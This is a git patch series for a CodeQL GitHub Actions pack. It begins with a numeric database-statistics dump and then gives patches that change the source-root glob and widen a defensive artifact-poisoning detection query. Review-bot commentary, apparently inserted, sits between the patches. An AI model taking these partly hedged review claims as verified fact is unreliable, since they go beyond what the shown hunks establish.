+8 + + +4 +7 +8 + + +7 +16 +8 + + + + + + +idx +id + + +12 + + +2 +3 +1 + + +4 +5 +3 + + +6 +7 +4 + + +8 +9 +1 + + +10 +11 +1 + + +12 +13 +1 + + +16 +17 +1 + + +24 +25 +1 + + +43 +44 +1 + + +90 +91 +1 + + + + + + +idx +name + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +3 + + +6 +7 +1 + + +8 +9 +1 + + +10 +11 +1 + + +12 +13 +1 + + +13 +14 +1 + + +18 +19 +1 + + +29 +30 +1 + + +37 +38 +1 + + + + + + +name +id + + +12 + + +1 +2 +65 + + +2 +3 +40 + + +3 +4 +6 + + +4 +7 +10 + + +9 +25 +2 + + + + + + +name +idx + + +12 + + +1 +2 +87 + + +2 +3 +34 + + +3 +4 
+2 + + + + + + + + +jsdoc_prefix_qualifier +823 + + +id +823 + + + + + +jsdoc_has_new_parameter +22 + + +fn +22 + + + + + +jsdoc_errors +id +1658 + + +id +1658 + + +tag +1460 + + +message +203 + + +tostring +89 + + + + +id +tag + + +12 + + +1 +2 +1658 + + + + + + +id +message + + +12 + + +1 +2 +1658 + + + + + + +id +tostring + + +12 + + +1 +2 +1658 + + + + + + +tag +id + + +12 + + +1 +2 +1262 + + +2 +3 +198 + + + + + + +tag +message + + +12 + + +1 +2 +1262 + + +2 +3 +198 + + + + + + +tag +tostring + + +12 + + +1 +2 +1262 + + +2 +3 +198 + + + + + + +message +id + + +12 + + +1 +2 +144 + + +2 +3 +27 + + +3 +7 +16 + + +7 +347 +16 + + + + + + +message +tag + + +12 + + +1 +2 +144 + + +2 +3 +27 + + +3 +7 +16 + + +7 +347 +16 + + + + + + +message +tostring + + +12 + + +1 +2 +203 + + + + + + +tostring +id + + +12 + + +1 +2 +48 + + +2 +3 +10 + + +3 +4 +3 + + +4 +5 +6 + + +5 +8 +7 + + +11 +27 +7 + + +34 +347 +7 + + +477 +478 +1 + + + + + + +tostring +tag + + +12 + + +1 +2 +48 + + +2 +3 +10 + + +3 +4 +3 + + +4 +5 +6 + + +5 +8 +7 + + +11 +27 +7 + + +34 +347 +7 + + +477 +478 +1 + + + + + + +tostring +message + + +12 + + +1 +2 +66 + + +2 +3 +6 + + +3 +4 +3 + + +4 +7 +7 + + +8 +25 +7 + + + + + + + + +yaml +id +885 + + +id +885 + + +kind +4 + + +parent +204 + + +idx +25 + + +tag +8 + + +tostring +318 + + + + +id +kind + + +12 + + +1 +2 +885 + + + + + + +id +parent + + +12 + + +1 +2 +885 + + + + + + +id +idx + + +12 + + +1 +2 +885 + + + + + + +id +tag + + +12 + + +1 +2 +885 + + + + + + +id +tostring + + +12 + + +1 +2 +885 + + + + + + +kind +id + + +12 + + +1 +2 +1 + + +35 +36 +1 + + +149 +150 +1 + + +700 +701 +1 + + + + + + +kind +parent + + +12 + + +1 +2 +1 + + +33 +34 +1 + + +90 +91 +1 + + +183 +184 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +1 + + +7 +8 +1 + + +11 +12 +1 + + +25 +26 +1 + + + + + + +kind +tag + + +12 + + +1 +2 +3 + + +5 +6 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +1 + + +10 +11 +1 + + +67 +68 +1 + + +240 +241 +1 + + + + + + +parent +id + + +12 + + +1 +2 
+33 + + +2 +3 +72 + + +3 +4 +2 + + +4 +5 +35 + + +6 +7 +29 + + +8 +11 +14 + + +12 +21 +17 + + +22 +25 +2 + + + + + + +parent +kind + + +12 + + +1 +2 +131 + + +2 +3 +43 + + +3 +4 +30 + + + + + + +parent +idx + + +12 + + +1 +2 +33 + + +2 +3 +72 + + +3 +4 +2 + + +4 +5 +35 + + +6 +7 +29 + + +8 +11 +14 + + +12 +21 +17 + + +22 +25 +2 + + + + + + +parent +tag + + +12 + + +1 +2 +120 + + +2 +3 +41 + + +3 +4 +36 + + +4 +5 +7 + + + + + + +parent +tostring + + +12 + + +1 +2 +33 + + +2 +3 +72 + + +3 +4 +2 + + +4 +5 +35 + + +5 +6 +5 + + +6 +7 +24 + + +8 +11 +14 + + +12 +14 +16 + + +16 +23 +3 + + + + + + +idx +id + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +4 +5 +7 + + +5 +20 +2 + + +20 +25 +2 + + +25 +33 +2 + + +33 +56 +2 + + +61 +64 +2 + + +95 +100 +2 + + +149 +172 +2 + + + + + + +idx +kind + + +12 + + +1 +2 +14 + + +2 +3 +4 + + +3 +4 +6 + + +4 +5 +1 + + + + + + +idx +parent + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +4 +5 +7 + + +5 +20 +2 + + +20 +25 +2 + + +25 +33 +2 + + +33 +56 +2 + + +61 +64 +2 + + +95 +100 +2 + + +149 +172 +2 + + + + + + +idx +tag + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +4 +3 + + +4 +5 +4 + + +6 +7 +2 + + + + + + +idx +tostring + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +3 +4 +3 + + +4 +5 +4 + + +5 +7 +2 + + +7 +11 +2 + + +12 +15 +2 + + +15 +16 +1 + + +18 +19 +2 + + +28 +31 +2 + + +52 +56 +2 + + +87 +88 +1 + + + + + + +tag +id + + +12 + + +1 +2 +2 + + +4 +5 +1 + + +15 +16 +1 + + +26 +27 +1 + + +35 +36 +1 + + +149 +150 +1 + + +654 +655 +1 + + + + + + +tag +kind + + +12 + + +1 +2 +8 + + + + + + +tag +parent + + +12 + + +1 +2 +2 + + +2 +3 +1 + + +3 +4 +1 + + +25 +26 +1 + + +33 +34 +1 + + +90 +91 +1 + + +183 +184 +1 + + + + + + +tag +idx + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +7 +8 +1 + + +9 +10 +1 + + +11 +12 +1 + + +23 +24 +1 + + + + + + +tag +tostring + + +12 + + +1 +2 +3 + + +2 +3 +1 + + +10 +11 +1 + + +13 +14 +1 + + +67 +68 +1 + + +223 +224 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +209 + + +2 +3 +42 + + +3 +6 +29 + + +6 +15 +25 + + +15 +18 +13 + + + + + + 
+tostring +kind + + +12 + + +1 +2 +318 + + + + + + +tostring +parent + + +12 + + +1 +2 +213 + + +2 +3 +41 + + +3 +6 +27 + + +6 +15 +25 + + +15 +18 +12 + + + + + + +tostring +idx + + +12 + + +1 +2 +272 + + +2 +3 +34 + + +3 +10 +12 + + + + + + +tostring +tag + + +12 + + +1 +2 +318 + + + + + + + + +yaml_anchors +1 + + +node +1 + + +anchor +1 + + + + +node +anchor + + +12 + + +1 +2 +1 + + + + + + +anchor +node + + +12 + + +1 +2 +1 + + + + + + + + +yaml_aliases +1 + + +alias +1 + + +target +1 + + + + +alias +target + + +12 + + +1 +2 +1 + + + + + + +target +alias + + +12 + + +1 +2 +1 + + + + + + + + +yaml_scalars +700 + + +scalar +700 + + +style +3 + + +value +241 + + + + +scalar +style + + +12 + + +1 +2 +700 + + + + + + +scalar +value + + +12 + + +1 +2 +700 + + + + + + +style +scalar + + +12 + + +14 +15 +1 + + +97 +98 +1 + + +589 +590 +1 + + + + + + +style +value + + +12 + + +12 +13 +1 + + +47 +48 +1 + + +183 +184 +1 + + + + + + +value +scalar + + +12 + + +1 +2 +158 + + +2 +3 +32 + + +3 +6 +19 + + +6 +15 +20 + + +15 +18 +12 + + + + + + +value +style + + +12 + + +1 +2 +240 + + +2 +3 +1 + + + + + + + + +yaml_errors +id +1 + + +id +1 + + +message +1 + + + + +id +message + + +12 + + +1 +2 +1 + + + + + + +message +id + + +12 + + +1 +2 +1 + + + + + + + + +yaml_locations +71 + + +locatable +71 + + +location +71 + + + + +locatable +location + + +12 + + +1 +2 +71 + + + + + + +location +locatable + + +12 + + +1 +2 +71 + + + + + + + + +xmlEncoding +39724 + + +id +39724 + + +encoding +1 + + + + +id +encoding + + +12 + + +1 +2 +39724 + + + + + + +encoding +id + + +12 + + +39724 +39725 +1 + + + + + + + + +xmlDTDs +1 + + +id +1 + + +root +1 + + +publicId +1 + + +systemId +1 + + +fileid +1 + + + + +id +root + + +12 + + +1 +2 +1 + + + + + + +id +publicId + + +12 + + +1 +2 +1 + + + + + + +id +systemId + + +12 + + +1 +2 +1 + + + + + + +id +fileid + + +12 + + +1 +2 +1 + + + + + + +root +id + + +12 + + +1 +2 +1 + + + + + + +root +publicId + + +12 + + +1 +2 +1 + + + + + + +root +systemId + + 
+12 + + +1 +2 +1 + + + + + + +root +fileid + + +12 + + +1 +2 +1 + + + + + + +publicId +id + + +12 + + +1 +2 +1 + + + + + + +publicId +root + + +12 + + +1 +2 +1 + + + + + + +publicId +systemId + + +12 + + +1 +2 +1 + + + + + + +publicId +fileid + + +12 + + +1 +2 +1 + + + + + + +systemId +id + + +12 + + +1 +2 +1 + + + + + + +systemId +root + + +12 + + +1 +2 +1 + + + + + + +systemId +publicId + + +12 + + +1 +2 +1 + + + + + + +systemId +fileid + + +12 + + +1 +2 +1 + + + + + + +fileid +id + + +12 + + +1 +2 +1 + + + + + + +fileid +root + + +12 + + +1 +2 +1 + + + + + + +fileid +publicId + + +12 + + +1 +2 +1 + + + + + + +fileid +systemId + + +12 + + +1 +2 +1 + + + + + + + + +xmlElements +1270313 + + +id +1270313 + + +name +4655 + + +parentid +578021 + + +idx +35122 + + +fileid +39721 + + + + +id +name + + +12 + + +1 +2 +1270313 + + + + + + +id +parentid + + +12 + + +1 +2 +1270313 + + + + + + +id +idx + + +12 + + +1 +2 +1270313 + + + + + + +id +fileid + + +12 + + +1 +2 +1270313 + + + + + + +name +id + + +12 + + +1 +2 +420 + + +2 +5 +156 + + +5 +6 +3832 + + +6 +310317 +247 + + + + + + +name +parentid + + +12 + + +1 +2 +456 + + +2 +5 +150 + + +5 +6 +3829 + + +6 +161565 +220 + + + + + + +name +idx + + +12 + + +1 +2 +4358 + + +2 +35123 +297 + + + + + + +name +fileid + + +12 + + +1 +2 +486 + + +2 +5 +133 + + +5 +6 +3831 + + +6 +14503 +205 + + + + + + +parentid +id + + +12 + + +1 +2 +371969 + + +2 +3 +62095 + + +3 +4 +104113 + + +4 +35123 +39844 + + + + + + +parentid +name + + +12 + + +1 +2 +500482 + + +2 +3 +17866 + + +3 +4 +49117 + + +4 +45 +10556 + + + + + + +parentid +idx + + +12 + + +1 +2 +371969 + + +2 +3 +62095 + + +3 +4 +104113 + + +4 +35123 +39844 + + + + + + +parentid +fileid + + +12 + + +1 +2 +578021 + + + + + + +idx +id + + +12 + + +2 +3 +606 + + +4 +5 +17851 + + +5 +6 +6533 + + +6 +7 +859 + + +7 +8 +4471 + + +9 +16 +2719 + + +16 +578022 +2083 + + + + + + +idx +name + + +12 + + +1 +2 +18457 + + +2 +3 +6533 + + +3 +4 +6178 + + +4 +8 +2624 + + +8 +4397 +1330 + + + + + + 
+idx +parentid + + +12 + + +2 +3 +606 + + +4 +5 +17851 + + +5 +6 +6533 + + +6 +7 +859 + + +7 +8 +4471 + + +9 +16 +2719 + + +16 +578022 +2083 + + + + + + +idx +fileid + + +12 + + +2 +3 +606 + + +4 +5 +17851 + + +5 +6 +6533 + + +6 +7 +859 + + +7 +8 +4471 + + +9 +16 +2719 + + +16 +39722 +2083 + + + + + + +fileid +id + + +12 + + +1 +2 +20457 + + +2 +3 +3115 + + +3 +7 +3026 + + +7 +8 +3588 + + +8 +9 +2220 + + +9 +11 +3099 + + +11 +19 +3087 + + +19 +114506 +1129 + + + + + + +fileid +name + + +12 + + +1 +2 +20459 + + +2 +3 +3458 + + +3 +5 +2569 + + +5 +7 +2172 + + +7 +8 +6158 + + +8 +9 +3501 + + +9 +46 +1404 + + + + + + +fileid +parentid + + +12 + + +1 +2 +20457 + + +2 +3 +3870 + + +3 +5 +2152 + + +5 +6 +2876 + + +6 +7 +2720 + + +7 +8 +4132 + + +8 +14 +3096 + + +14 +31079 +418 + + + + + + +fileid +idx + + +12 + + +1 +2 +25894 + + +2 +3 +5301 + + +3 +4 +3787 + + +4 +6 +3268 + + +6 +35123 +1471 + + + + + + + + +xmlAttrs +1202020 + + +id +1202020 + + +elementid +760198 + + +name +3649 + + +value +121803 + + +idx +2000 + + +fileid +39448 + + + + +id +elementid + + +12 + + +1 +2 +1202020 + + + + + + +id +name + + +12 + + +1 +2 +1202020 + + + + + + +id +value + + +12 + + +1 +2 +1202020 + + + + + + +id +idx + + +12 + + +1 +2 +1202020 + + + + + + +id +fileid + + +12 + + +1 +2 +1202020 + + + + + + +elementid +id + + +12 + + +1 +2 +425697 + + +2 +3 +249659 + + +3 +4 +66474 + + +4 +2001 +18368 + + + + + + +elementid +name + + +12 + + +1 +2 +425778 + + +2 +3 +249579 + + +3 +4 +66475 + + +4 +2001 +18366 + + + + + + +elementid +value + + +12 + + +1 +2 +466237 + + +2 +3 +266291 + + +3 +46 +27670 + + + + + + +elementid +idx + + +12 + + +1 +2 +425697 + + +2 +3 +249659 + + +3 +4 +66474 + + +4 +2001 +18368 + + + + + + +elementid +fileid + + +12 + + +1 +2 +760198 + + + + + + +name +id + + +12 + + +1 +2 +3467 + + +2 +262475 +182 + + + + + + +name +elementid + + +12 + + +1 +2 +3467 + + +2 +262475 +182 + + + + + + +name +value + + +12 + + +1 +2 +3501 + + +2 +54146 +148 + + + + + + +name +idx + 
+ +12 + + +1 +2 +3531 + + +2 +11 +118 + + + + + + +name +fileid + + +12 + + +1 +2 +3491 + + +2 +21768 +158 + + + + + + +value +id + + +12 + + +1 +2 +72032 + + +2 +3 +42366 + + +3 +199269 +7405 + + + + + + +value +elementid + + +12 + + +1 +2 +72036 + + +2 +3 +42374 + + +3 +199269 +7393 + + + + + + +value +name + + +12 + + +1 +2 +116722 + + +2 +2041 +5081 + + + + + + +value +idx + + +12 + + +1 +2 +117957 + + +2 +2001 +3846 + + + + + + +value +fileid + + +12 + + +1 +2 +86306 + + +2 +3 +28570 + + +3 +4175 +6927 + + + + + + +idx +id + + +12 + + +1 +2 +1955 + + +2 +760199 +45 + + + + + + +idx +elementid + + +12 + + +1 +2 +1955 + + +2 +760199 +45 + + + + + + +idx +name + + +12 + + +1 +2 +1955 + + +2 +189 +45 + + + + + + +idx +value + + +12 + + +1 +2 +1955 + + +2 +116643 +45 + + + + + + +idx +fileid + + +12 + + +1 +2 +1955 + + +2 +39449 +45 + + + + + + +fileid +id + + +12 + + +1 +2 +22884 + + +2 +4 +2565 + + +4 +6 +2294 + + +6 +7 +3299 + + +7 +9 +3272 + + +9 +16 +3143 + + +16 +129952 +1991 + + + + + + +fileid +elementid + + +12 + + +1 +2 +23890 + + +2 +4 +2131 + + +4 +5 +1971 + + +5 +6 +4096 + + +6 +8 +3519 + + +8 +16 +3137 + + +16 +106600 +704 + + + + + + +fileid +name + + +12 + + +1 +2 +22946 + + +2 +3 +2338 + + +3 +4 +2726 + + +4 +5 +2824 + + +5 +6 +2994 + + +6 +7 +3876 + + +7 +2002 +1744 + + + + + + +fileid +value + + +12 + + +1 +2 +22916 + + +2 +4 +2772 + + +4 +5 +2112 + + +5 +6 +3510 + + +6 +8 +1993 + + +8 +11 +3365 + + +11 +50357 +2780 + + + + + + +fileid +idx + + +12 + + +1 +2 +26133 + + +2 +3 +9699 + + +3 +5 +3511 + + +5 +2001 +105 + + + + + + + + +xmlNs +71201 + + +id +4185 + + +prefixName +958 + + +URI +4185 + + +fileid +39544 + + + + +id +prefixName + + +12 + + +1 +2 +2602 + + +2 +3 +1553 + + +3 +872 +30 + + + + + + +id +URI + + +12 + + +1 +2 +4185 + + + + + + +id +fileid + + +12 + + +1 +6 +274 + + +6 +7 +3825 + + +7 +24905 +86 + + + + + + +prefixName +id + + +12 + + +1 +2 +915 + + +2 +4054 +43 + + + + + + +prefixName +URI + + +12 + + +1 +2 +915 + + +2 +4054 
+43 + + + + + + +prefixName +fileid + + +12 + + +1 +2 +828 + + +2 +5 +73 + + +5 +24903 +57 + + + + + + +URI +id + + +12 + + +1 +2 +4185 + + + + + + +URI +prefixName + + +12 + + +1 +2 +2602 + + +2 +3 +1553 + + +3 +872 +30 + + + + + + +URI +fileid + + +12 + + +1 +6 +274 + + +6 +7 +3825 + + +7 +24905 +86 + + + + + + +fileid +id + + +12 + + +1 +2 +11655 + + +2 +3 +26146 + + +3 +8 +1743 + + + + + + +fileid +prefixName + + +12 + + +1 +2 +11653 + + +2 +3 +25982 + + +3 +31 +1909 + + + + + + +fileid +URI + + +12 + + +1 +2 +11655 + + +2 +3 +26146 + + +3 +8 +1743 + + + + + + + + +xmlHasNs +1139730 + + +elementId +1139730 + + +nsId +4136 + + +fileid +39537 + + + + +elementId +nsId + + +12 + + +1 +2 +1139730 + + + + + + +elementId +fileid + + +12 + + +1 +2 +1139730 + + + + + + +nsId +elementId + + +12 + + +1 +5 +234 + + +5 +6 +3824 + + +6 +643289 +78 + + + + + + +nsId +fileid + + +12 + + +1 +5 +257 + + +5 +6 +3823 + + +6 +24759 +56 + + + + + + +fileid +elementId + + +12 + + +1 +2 +3669 + + +2 +3 +20429 + + +3 +7 +2536 + + +7 +8 +3473 + + +8 +9 +2258 + + +9 +11 +3036 + + +11 +18 +2966 + + +18 +147552 +1170 + + + + + + +fileid +nsId + + +12 + + +1 +2 +18261 + + +2 +3 +21032 + + +3 +8 +244 + + + + + + + + +xmlComments +26812 + + +id +26812 + + +text +22933 + + +parentid +26546 + + +fileid +26368 + + + + +id +text + + +12 + + +1 +2 +26812 + + + + + + +id +parentid + + +12 + + +1 +2 +26812 + + + + + + +id +fileid + + +12 + + +1 +2 +26812 + + + + + + +text +id + + +12 + + +1 +2 +21517 + + +2 +62 +1416 + + + + + + +text +parentid + + +12 + + +1 +2 +21519 + + +2 +62 +1414 + + + + + + +text +fileid + + +12 + + +1 +2 +21522 + + +2 +62 +1411 + + + + + + +parentid +id + + +12 + + +1 +2 +26379 + + +2 +17 +167 + + + + + + +parentid +text + + +12 + + +1 +2 +26379 + + +2 +17 +167 + + + + + + +parentid +fileid + + +12 + + +1 +2 +26546 + + + + + + +fileid +id + + +12 + + +1 +2 +26161 + + +2 +17 +207 + + + + + + +fileid +text + + +12 + + +1 +2 +26165 + + +2 +17 +203 + + + + + + +fileid +parentid 
+ + +12 + + +1 +2 +26223 + + +2 +10 +145 + + + + + + + + +xmlChars +439958 + + +id +439958 + + +text +100518 + + +parentid +433851 + + +idx +4 + + +isCDATA +1 + + +fileid +26494 + + + + +id +text + + +12 + + +1 +2 +439958 + + + + + + +id +parentid + + +12 + + +1 +2 +439958 + + + + + + +id +idx + + +12 + + +1 +2 +439958 + + + + + + +id +isCDATA + + +12 + + +1 +2 +439958 + + + + + + +id +fileid + + +12 + + +1 +2 +439958 + + + + + + +text +id + + +12 + + +1 +2 +60389 + + +2 +4 +3811 + + +4 +5 +29257 + + +5 +23171 +7061 + + + + + + +text +parentid + + +12 + + +1 +2 +60389 + + +2 +4 +3811 + + +4 +5 +29257 + + +5 +23171 +7061 + + + + + + +text +idx + + +12 + + +1 +2 +100517 + + +2 +3 +1 + + + + + + +text +isCDATA + + +12 + + +1 +2 +100518 + + + + + + +text +fileid + + +12 + + +1 +2 +61284 + + +2 +4 +4205 + + +4 +5 +28328 + + +5 +351 +6701 + + + + + + +parentid +id + + +12 + + +1 +2 +429716 + + +2 +5 +4135 + + + + + + +parentid +text + + +12 + + +1 +2 +429716 + + +2 +5 +4135 + + + + + + +parentid +idx + + +12 + + +1 +2 +429716 + + +2 +5 +4135 + + + + + + +parentid +isCDATA + + +12 + + +1 +2 +433851 + + + + + + +parentid +fileid + + +12 + + +1 +2 +433851 + + + + + + +idx +id + + +12 + + +80 +81 +1 + + +1892 +1893 +1 + + +4135 +4136 +1 + + +433851 +433852 +1 + + + + + + +idx +text + + +12 + + +1 +2 +1 + + +3 +4 +1 + + +16 +17 +1 + + +100499 +100500 +1 + + + + + + +idx +parentid + + +12 + + +80 +81 +1 + + +1892 +1893 +1 + + +4135 +4136 +1 + + +433851 +433852 +1 + + + + + + +idx +isCDATA + + +12 + + +1 +2 +4 + + + + + + +idx +fileid + + +12 + + +4 +5 +1 + + +46 +47 +1 + + +97 +98 +1 + + +26494 +26495 +1 + + + + + + +isCDATA +id + + +12 + + +439958 +439959 +1 + + + + + + +isCDATA +text + + +12 + + +100518 +100519 +1 + + + + + + +isCDATA +parentid + + +12 + + +433851 +433852 +1 + + + + + + +isCDATA +idx + + +12 + + +4 +5 +1 + + + + + + +isCDATA +fileid + + +12 + + +26494 +26495 +1 + + + + + + +fileid +id + + +12 + + +1 +2 +25303 + + +2 +35123 +1191 + + + + + + +fileid +text + + 
+12 + + +1 +2 +25765 + + +2 +35123 +729 + + + + + + +fileid +parentid + + +12 + + +1 +2 +25312 + + +2 +35123 +1182 + + + + + + +fileid +idx + + +12 + + +1 +2 +26397 + + +2 +5 +97 + + + + + + +fileid +isCDATA + + +12 + + +1 +2 +26494 + + + + + + + + +xmllocations +3051056 + + +xmlElement +2982460 + + +location +3051056 + + + + +xmlElement +location + + +12 + + +1 +2 +2978326 + + +2 +24903 +4134 + + + + + + +location +xmlElement + + +12 + + +1 +2 +3051056 + + + + + + + + +filetype +1102 + + +file +1102 + + +filetype +3 + + + + +file +filetype + + +12 + + +1 +2 +1102 + + + + + + +filetype +file + + +12 + + +1 +2 +1 + + +162 +163 +1 + + +939 +940 +1 + + + + + + + + +configs +69795 + + +id +69795 + + + + + +configNames +69794 + + +id +69794 + + +config +69794 + + +name +12859 + + + + +id +config + + +12 + + +1 +2 +69794 + + + + + + +id +name + + +12 + + +1 +2 +69794 + + + + + + +config +id + + +12 + + +1 +2 +69794 + + + + + + +config +name + + +12 + + +1 +2 +69794 + + + + + + +name +id + + +12 + + +1 +2 +4858 + + +2 +3 +593 + + +3 +4 +2806 + + +4 +10 +169 + + +10 +11 +1900 + + +11 +12 +1757 + + +12 +111 +776 + + + + + + +name +config + + +12 + + +1 +2 +4858 + + +2 +3 +593 + + +3 +4 +2806 + + +4 +10 +169 + + +10 +11 +1900 + + +11 +12 +1757 + + +12 +111 +776 + + + + + + + + +configValues +69691 + + +id +69691 + + +config +69691 + + +value +54399 + + + + +id +config + + +12 + + +1 +2 +69691 + + + + + + +id +value + + +12 + + +1 +2 +69691 + + + + + + +config +id + + +12 + + +1 +2 +69691 + + + + + + +config +value + + +12 + + +1 +2 +69691 + + + + + + +value +id + + +12 + + +1 +2 +48220 + + +2 +4 +4804 + + +4 +546 +1375 + + + + + + +value +config + + +12 + + +1 +2 +48220 + + +2 +4 +4804 + + +4 +546 +1375 + + + + + + + + +configLocations +209280 + + +locatable +209280 + + +location +209280 + + + + +locatable +location + + +12 + + +1 +2 +209280 + + + + + + +location +locatable + + +12 + + +1 +2 +209280 + + + + + + + + +extraction_time +378 + + +file +21 + + +extractionPhase +9 
+ + +timerKind +2 + + +time +43 + + + + +file +extractionPhase + + +12 + + +9 +10 +21 + + + + + + +file +timerKind + + +12 + + +2 +3 +21 + + + + + + +file +time + + +12 + + +3 +4 +21 + + + + + + +extractionPhase +file + + +12 + + +21 +22 +9 + + + + + + +extractionPhase +timerKind + + +12 + + +2 +3 +9 + + + + + + +extractionPhase +time + + +12 + + +1 +2 +8 + + +42 +43 +1 + + + + + + +timerKind +file + + +12 + + +21 +22 +2 + + + + + + +timerKind +extractionPhase + + +12 + + +9 +10 +2 + + + + + + +timerKind +time + + +12 + + +22 +23 +2 + + + + + + +time +file + + +12 + + +1 +2 +42 + + +21 +22 +1 + + + + + + +time +extractionPhase + + +12 + + +1 +2 +42 + + +8 +9 +1 + + + + + + +time +timerKind + + +12 + + +1 +2 +42 + + +2 +3 +1 + + + + + + + + +extraction_data +21 + + +file +21 + + +cacheFile +21 + + +fromCache +1 + + +length +21 + + + + +file +cacheFile + + +12 + + +1 +2 +21 + + + + + + +file +fromCache + + +12 + + +1 +2 +21 + + + + + + +file +length + + +12 + + +1 +2 +21 + + + + + + +cacheFile +file + + +12 + + +1 +2 +21 + + + + + + +cacheFile +fromCache + + +12 + + +1 +2 +21 + + + + + + +cacheFile +length + + +12 + + +1 +2 +21 + + + + + + +fromCache +file + + +12 + + +21 +22 +1 + + + + + + +fromCache +cacheFile + + +12 + + +21 +22 +1 + + + + + + +fromCache +length + + +12 + + +21 +22 +1 + + + + + + +length +file + + +12 + + +1 +2 +21 + + + + + + +length +cacheFile + + +12 + + +1 +2 +21 + + + + + + +length +fromCache + + +12 + + +1 +2 +21 + + + + + + + + + diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 82795df0006..4b8239b7f6c 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml 
@@ -5,22 +5,12 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/javascript-all: - version: 1.0.0 - codeql/mad: - version: 1.0.0 - codeql/regex: - version: 1.0.0 codeql/ssa: version: 1.0.0 - codeql/tutorial: - version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 - codeql/xml: - version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false From ceac1c6392ff107ed5aea4a819f17abf7bfed141 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:50:53 +0200 Subject: [PATCH 0335/1267] Do not scan JS files --- .github/action/dist/index.js | 1 + .github/action/src/codeql.ts | 1 + 2 files changed, 2 insertions(+) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 7bb3039fe48..24092120560 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28684,6 +28684,7 @@ async function codeqlDatabaseCreate(codeql) { } var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; + source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", "create", diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 08c4b420a4c..fe2f9b49029 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -121,6 +121,7 @@ export async function codeqlDatabaseCreate( var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; + source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", From a84c1c4706b4fcce446e96aa7ddd6befdc6d9265 Mon Sep 17 00:00:00 2001 
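Review bot: In `.github/action/src/codeql.ts`, the added `source_root = path.join(source_root, "**", "*.yml");` turns the directory held in `source_root` into a glob string, and the pattern leaves out workflow files with a `.yaml` extension, so those would go unscanned. The `runCommand` argument list and the rest of `codeqlDatabaseCreate` continue outside the hunk, but if `source_root` is passed on as the database source root it presumably has to remain a directory. I would drop the added line and select files in the extraction configuration instead, leaving a comment such as `// source_root must stay a directory; file selection is done by the extractor configuration`. The same line is repeated in the bundled `.github/action/dist/index.js`.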
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:51:15 +0200 Subject: [PATCH 0336/1267] Minor improvemnts --- .../actions/security/ArtifactPoisoningQuery.qll | 13 +++++++------ ql/lib/codeql/actions/security/PoisonableSteps.qll | 5 +++-- 2 files changed, 10 insertions(+), 8 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 45d9a08d00a..060471bb5dc 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -20,12 +20,13 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep DownloadArtifactActionStep() { this.getCallee() = [ - "dawidd6/action-download-artifact", "marcofaggian/action-download-multiple-artifacts", - "benday-inc/download-latest-artifact", "blablacar/action-download-last-artifact", - "levonet/action-download-last-artifact", "bettermarks/action-artifact-download", - "aochmann/actions-download-artifact", "cytopia/download-artifact-retry-action", - "alextompkins/download-prior-artifact", "nmerget/download-gzip-artifact", - "benday-inc/download-artifact", "synergy-au/download-workflow-artifacts-action", + "actions/download-artifact", "dawidd6/action-download-artifact", + "marcofaggian/action-download-multiple-artifacts", "benday-inc/download-latest-artifact", + "blablacar/action-download-last-artifact", "levonet/action-download-last-artifact", + "bettermarks/action-artifact-download", "aochmann/actions-download-artifact", + "cytopia/download-artifact-retry-action", "alextompkins/download-prior-artifact", + "nmerget/download-gzip-artifact", "benday-inc/download-artifact", + "synergy-au/download-workflow-artifacts-action", "ishworkh/docker-image-artifact-download", "ishworkh/container-image-artifact-download", "sidx1024/action-download-artifact", "hyperskill/azblob-download-artifact", "ma-ve/action-download-artifact-with-retry" ] and 
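Review bot: Adding `"actions/download-artifact"` to the callee list of `DownloadArtifactActionStep` treats every use of the official action as an untrusted download, although by default it only fetches artifacts produced in the same workflow run. The conjuncts after `] and` lie outside the hunk, so this is hedged, but unless they test for a cross-run download the query will likely report same-run downloads as poisoning candidates. I would keep the official action out of this list and model it in its own class that requires the cross-run inputs, e.g. `exists(this.getArgument("run-id")) and exists(this.getArgument("github-token"))`.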
